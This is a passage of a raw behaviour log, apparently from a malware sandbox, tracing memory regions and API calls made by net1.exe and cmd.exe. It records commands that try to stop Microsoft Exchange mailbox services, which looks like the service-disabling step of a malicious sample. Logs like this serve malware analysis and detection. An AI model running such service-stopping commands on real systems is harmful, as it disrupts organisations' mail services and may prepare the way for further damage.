start_va = 0x5f0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10824 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10825 start_va = 0x620000 end_va = 0x633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10826 start_va = 0x640000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 10827 start_va = 0x680000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 10828 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 10829 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 10830 start_va = 0x720000 end_va = 0x721fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 10831 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10832 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10833 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10834 start_va = 0x7e5e0000 end_va = 0x7e602fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5e0000" filename = "" Region: id = 10835 start_va = 0x7e608000 end_va = 0x7e608fff entry_point = 0x0 region_type = private name = "private_0x000000007e608000" filename = "" Region: id = 10836 start_va = 0x7e60b000 end_va = 0x7e60dfff entry_point = 0x0 region_type = private name = "private_0x000000007e60b000" filename = "" Region: id = 10837 start_va = 0x7e60e000 end_va = 0x7e60efff entry_point = 0x0 region_type = private name = "private_0x000000007e60e000" filename = "" Region: id = 10838 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10839 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10840 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10841 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10842 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10843 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 10844 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10845 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10846 start_va = 0x930000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 10847 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10848 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 10849 start_va = 0x600000 end_va = 0x603fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 10850 start_va = 0x730000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 10851 start_va = 0x7d0000 end_va = 0x88dfff entry_point = 0x7d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10852 start_va = 0x890000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 10853 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 10854 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10855 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10856 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10857 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10858 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10859 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10860 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10861 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10862 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10863 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10864 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10865 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10866 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10867 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10868 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10869 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10870 start_va = 0x7e4e0000 end_va = 0x7e5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4e0000" filename = "" Region: id = 10871 start_va = 0x7e605000 end_va = 0x7e607fff entry_point = 0x0 region_type = private name = "private_0x000000007e605000" filename = "" Region: id = 10872 start_va = 0x610000 end_va = 0x613fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10873 start_va = 0x770000 end_va = 0x772fff entry_point = 0x770000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10874 start_va = 0x780000 end_va = 0x7b1fff entry_point = 0x780000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 666 os_tid = 0xf58 [0137.753] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0137.753] __set_app_type (_Type=0x1) [0137.753] __p__fmode () returned 0x77ac4d6c [0137.753] __p__commode () returned 0x77ac5b1c [0137.754] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0137.754] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0137.754] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.754] GetConsoleOutputCP () returned 0x1b5 [0137.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0137.754] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.756] sprintf_s (in: _DstBuf=0x6ff80c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0137.756] setlocale (category=0, locale=".437") returned="English_United States.437" [0137.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0137.758] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0137.758] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailboxAssistants" [0137.758] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6ff5b4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0137.758] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x6ff5a8 | out: Buffer=0x6ff5a8*=0x937f58) returned 0x0 [0137.758] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x6ff5ac | out: Buffer=0x6ff5ac*=0x937fd0) returned 0x0 [0137.758] __iob_func () returned 0x77ac1208 [0137.758] _fileno (_File=0x77ac1208) returned 0 [0137.758] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0137.758] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0137.758] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0137.758] _wcsicmp (_String1="config", _String2="stop") returned -16 [0137.758] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0137.758] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0137.758] _wcsicmp (_String1="file", _String2="stop") returned -13 [0137.758] _wcsicmp (_String1="files", _String2="stop") returned -13 [0137.758] _wcsicmp (_String1="group", _String2="stop") returned -12 [0137.758] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0137.758] _wcsicmp (_String1="help", _String2="stop") returned -11 [0137.758] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0137.758] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0137.758] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0137.758] _wcsicmp (_String1="session", _String2="stop") returned -15 [0137.758] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0137.758] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0137.758] _wcsicmp (_String1="share", _String2="stop") returned -12 [0137.758] _wcsicmp (_String1="start", _String2="stop") returned -14 [0137.758] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0137.758] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0137.758] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0137.758] _wcsicmp (_String1="accounts", _String2="MSExchangeMailboxAssistants") returned -12 [0137.758] _wcsicmp (_String1="computer", _String2="MSExchangeMailboxAssistants") returned -10 [0137.758] _wcsicmp (_String1="config", _String2="MSExchangeMailboxAssistants") returned -10 [0137.758] _wcsicmp (_String1="continue", _String2="MSExchangeMailboxAssistants") returned -10 [0137.758] _wcsicmp (_String1="cont", _String2="MSExchangeMailboxAssistants") returned -10 [0137.758] _wcsicmp (_String1="file", _String2="MSExchangeMailboxAssistants") returned -7 [0137.758] _wcsicmp (_String1="files", _String2="MSExchangeMailboxAssistants") returned -7 [0137.758] _wcsicmp (_String1="group", _String2="MSExchangeMailboxAssistants") returned -6 [0137.758] _wcsicmp (_String1="groups", _String2="MSExchangeMailboxAssistants") returned -6 [0137.758] _wcsicmp (_String1="help", _String2="MSExchangeMailboxAssistants") returned -5 [0137.758] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMailboxAssistants") returned -5 [0137.758] _wcsicmp (_String1="localgroup", _String2="MSExchangeMailboxAssistants") returned -1 [0137.758] _wcsicmp (_String1="pause", _String2="MSExchangeMailboxAssistants") returned 3 [0137.759] _wcsicmp (_String1="session", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="sessions", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="sess", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="share", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="start", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="stats", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="statistics", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="stop", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="time", _String2="MSExchangeMailboxAssistants") returned 7 [0137.759] _wcsicmp (_String1="user", _String2="MSExchangeMailboxAssistants") returned 8 [0137.759] _wcsicmp (_String1="users", _String2="MSExchangeMailboxAssistants") returned 8 [0137.759] _wcsicmp (_String1="msg", _String2="MSExchangeMailboxAssistants") returned 2 [0137.759] _wcsicmp (_String1="messenger", _String2="MSExchangeMailboxAssistants") returned -14 [0137.759] _wcsicmp (_String1="receiver", _String2="MSExchangeMailboxAssistants") returned 5 [0137.759] _wcsicmp (_String1="rcv", _String2="MSExchangeMailboxAssistants") returned 5 [0137.759] _wcsicmp (_String1="netpopup", _String2="MSExchangeMailboxAssistants") returned 1 [0137.759] _wcsicmp (_String1="redirector", _String2="MSExchangeMailboxAssistants") returned 5 [0137.759] _wcsicmp (_String1="redir", _String2="MSExchangeMailboxAssistants") returned 5 [0137.759] _wcsicmp (_String1="rdr", _String2="MSExchangeMailboxAssistants") returned 5 [0137.759] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeMailboxAssistants") returned 10 [0137.759] _wcsicmp (_String1="work", _String2="MSExchangeMailboxAssistants") returned 10 [0137.759] _wcsicmp (_String1="wksta", _String2="MSExchangeMailboxAssistants") returned 10 [0137.759] _wcsicmp (_String1="prdr", _String2="MSExchangeMailboxAssistants") returned 3 [0137.759] _wcsicmp (_String1="devrdr", _String2="MSExchangeMailboxAssistants") returned -9 [0137.759] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMailboxAssistants") returned -1 [0137.759] _wcsicmp (_String1="server", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="svr", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="srv", _String2="MSExchangeMailboxAssistants") returned 6 [0137.759] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMailboxAssistants") returned -1 [0137.759] _wcsicmp (_String1="alerter", _String2="MSExchangeMailboxAssistants") returned -12 [0137.759] _wcsicmp (_String1="netlogon", _String2="MSExchangeMailboxAssistants") returned 1 [0137.759] _wcsupr (in: _String="MSExchangeMailboxAssistants" | out: _String="MSEXCHANGEMAILBOXASSISTANTS") returned="MSEXCHANGEMAILBOXASSISTANTS" [0137.759] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x932650 [0137.761] GetServiceKeyNameW (in: hSCManager=0x932650, lpDisplayName="MSEXCHANGEMAILBOXASSISTANTS", lpServiceName=0x10a8cb0, lpcchBuffer=0x6ff524 | out: lpServiceName="", lpcchBuffer=0x6ff524) returned 0 [0137.761] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 2 [0137.761] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned -14 [0137.761] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 5 [0137.761] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 5 [0137.762] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 5 [0137.762] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 5 [0137.762] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 5 [0137.762] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 10 [0137.762] _wcsicmp (_String1="work", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 10 [0137.762] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 10 [0137.762] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 3 [0137.762] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned -9 [0137.762] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned -1 [0137.762] _wcsicmp (_String1="server", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 6 [0137.762] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 6 [0137.762] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 6 [0137.762] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned -1 [0137.762] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned -12 [0137.762] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMAILBOXASSISTANTS") returned 1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="WORKSTATION") returned -10 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="LanmanWorkstation") returned 1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="SERVER") returned -6 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="LanmanServer") returned 1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="BROWSER") returned 11 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="BROWSER") returned 11 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="MESSENGER") returned 14 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="MESSENGER") returned 14 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETRUN") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETRUN") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="SPOOLER") returned -6 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="SPOOLER") returned -6 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="ALERTER") returned 12 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="ALERTER") returned 12 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETLOGON") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETLOGON") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETPOPUP") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="NETPOPUP") returned -1 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="SQLSERVER") returned -6 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="SQLSERVER") returned -6 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="REPLICATOR") returned -5 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="REPLICATOR") returned -5 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="REMOTEBOOT") returned -5 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="REMOTEBOOT") returned -5 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="TIMESOURCE") returned -7 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="TIMESOURCE") returned -7 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="AFP") returned 12 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="AFP") returned 12 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="UPS") returned -8 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="UPS") returned -8 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="XACTSRV") returned -11 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="XACTSRV") returned -11 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="TCPIP") returned -7 [0137.762] _wcsicmp (_String1="MSEXCHANGEMAILBOXASSISTANTS", _String2="TCPIP") returned -7 [0137.762] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x93b088 [0137.763] OpenServiceW (hSCManager=0x93b088, lpServiceName="MSEXCHANGEMAILBOXASSISTANTS", dwDesiredAccess=0x84) returned 0x0 [0137.763] GetLastError () returned 0x424 [0137.763] CloseServiceHandle (hSCObject=0x93b088) returned 1 [0137.763] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0137.763] LoadLibraryW (lpLibFileName="NETMSG") returned 0x770000 [0137.764] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0137.765] GetFileType (hFile=0x40) returned 0x2 [0137.765] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff3c0 | out: lpMode=0x6ff3c0) returned 1 [0137.765] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x6ff3cc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x6ff3cc*=0x1e) returned 1 [0137.765] GetFileType (hFile=0x40) returned 0x2 [0137.765] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff3c0 | out: lpMode=0x6ff3c0) returned 1 [0137.766] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6ff3cc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x6ff3cc*=0x2) returned 1 [0137.766] _ultow (in: _Dest=0x889, _Radix=7336928 | out: _Dest=0x889) returned="2185" [0137.766] FormatMessageW (in: dwFlags=0x2800, lpSource=0x770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0137.766] GetFileType (hFile=0x40) returned 0x2 [0137.766] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff3b0 | out: lpMode=0x6ff3b0) returned 1 [0137.766] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x6ff3bc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x6ff3bc*=0x34) returned 1 [0137.766] GetFileType (hFile=0x40) returned 0x2 [0137.766] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x6ff3b0 | out: lpMode=0x6ff3b0) returned 1 [0137.766] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6ff3bc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x6ff3bc*=0x2) returned 1 [0137.767] NetApiBufferFree (Buffer=0x937f58) returned 0x0 [0137.767] NetApiBufferFree (Buffer=0x937fd0) returned 0x0 [0137.767] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailboxAssistants" [0137.767] exit (_Code=2) Thread: id = 667 os_tid = 0xf7c Process: id = "221" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x12f53000" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeMailboxReplication" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10875 start_va = 0x150000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10876 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10877 start_va = 0x180000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 10878 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 10879 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 10880 start_va = 0x2e0000 end_va = 0x2e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 10881 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 10882 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10883 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10884 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 10885 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10886 start_va = 